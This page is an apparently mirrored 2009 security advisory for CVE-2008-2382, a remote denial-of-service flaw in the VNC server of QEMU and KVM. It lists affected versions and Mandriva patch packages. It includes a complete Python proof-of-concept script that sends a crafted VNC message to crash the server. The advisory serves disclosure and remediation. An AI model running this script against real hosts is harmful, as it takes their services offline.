No account yet?
Home » Exploits » QEMU and KVM VNC Server Remote Denial of Service Vulnerability
QEMU and KVM VNC Server Remote Denial of Service Vulnerability E-mail
Feeds - Exploits
Written by Alfredo Ortega from Core Security Technologies   
Monday, 06 April 2009 23:11
QEMU and KVM VNC Server Remote Denial of Service Vulnerability


-\\Bugtraq ID:
32910

-\\Class:
Failure to Handle Exceptional Conditions

-\\CVE:
CVE-2008-2382


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Dec 22 2008 12:00AM

-\\Updated:
Apr 06 2009 08:16PM

-\\Credit:
Alfredo Ortega from Core Security Technologies



-\\Vulnerable:
S.u.S.E. SUSE Linux Enterprise Server  11
+ Linux kernel 2.6.5
S.u.S.E. SUSE Linux Enterprise Server  10
S.u.S.E. openSUSE  11.1
S.u.S.E. openSUSE  11.0
S.u.S.E. openSUSE  10.3
RedHat Fedora 9  0
Qumranet KVM  79
Qumranet KVM  36
QEMU QEMU 0.9.1
QEMU QEMU 0.9
QEMU QEMU 0.8.2
QEMU QEMU 0.6.1
Pardus Linux 2008  0
MandrakeSoft Linux Mandrake  2009.0 x86_64
MandrakeSoft Linux Mandrake  2009.0
MandrakeSoft Linux Mandrake  2008.1 x86_64
MandrakeSoft Linux Mandrake  2008.1
MandrakeSoft Linux Mandrake  2008.0 x86_64
MandrakeSoft Linux Mandrake  2008.0



-\\Discussion
QEMU and KVM are prone to a remote denial-of-service vulnerability that affects the included VNC server.

Attackers can exploit this issue to create a denial-of-service condition.

The following are vulnerable:

QEMU 0.9.1 and prior
KVM-79 and prior



-\\Exploit(s)/PoC(s):
The following example exploit is available:

===============================================================
32910.py
^^^^^^^^^
##
## vnc remote DoS
##

import socket
import time
import struct
import sys

if len(sys.argv)<3:
    print "Usage: %s host port" % sys.argv[0]
    exit(0)

host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900

s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion

#Security types

sec=s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])

# Authentication result
auth=s.recv(100)
if auth=="\x00\x00\x00\x00":
    print "Auth ok."

# Share desktop flag: no
s.send("\x00")

# Server framebuffer parameters:
framebuf=s.recv(100)

# Trigger the bug
s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("<L",1)*5)

s.close()





-\\Solution
Updates are available. Please see the references for more information.


MandrakeSoft Linux Mandrake  2008.1 x86_64
--Mandriva  dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.x86_64.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-0.9.0-18.3mdv2008.1.x86_64.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-img-0.9.0-18.3mdv2008.1.x86_64.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/

MandrakeSoft Linux Mandrake  2008.1
--Mandriva  dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-0.9.0-18.3mdv2008.1.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-img-0.9.0-18.3mdv2008.1.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/

MandrakeSoft Linux Mandrake  2009.0
--Mandriva  dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  kvm-74-3.1mdv2009.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-img-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/

MandrakeSoft Linux Mandrake  2009.0 x86_64
--Mandriva  dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.x86_64.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  kvm-74-3.1mdv2009.0.x86_64.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-img-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/

MandrakeSoft Linux Mandrake  2008.0 x86_64
--Mandriva  dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.x86_64.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-0.9.0-16.3mdv2008.0.x86_64.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-img-0.9.0-16.3mdv2008.0.x86_64.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/

MandrakeSoft Linux Mandrake  2008.0
--Mandriva  dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-0.9.0-16.3mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/
--Mandriva  qemu-img-0.9.0-16.3mdv2008.0.i586.rpm
http://www.mandriva.com/en/downloadhttp://www.mandriva.com/en/download/



-\\Reference(s)
--KVM Homepage
http://kvm.qumranet.com/kvmwiki/Front_Pag  (Qumranet)
--Qemu and KVM VNC server remote DoS
http://www.coresecurity.com/content/vnc-remote-do  (Core Security Technologies)
--QEMU Homepage
http://bellard.org/qemu  (QEMU)
--CORE-2008-1210: Qemu and KVM VNC server remote DoS
http://www.securityfocus.com/archive/1/49950
(CORE Security Technologies Advisories < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff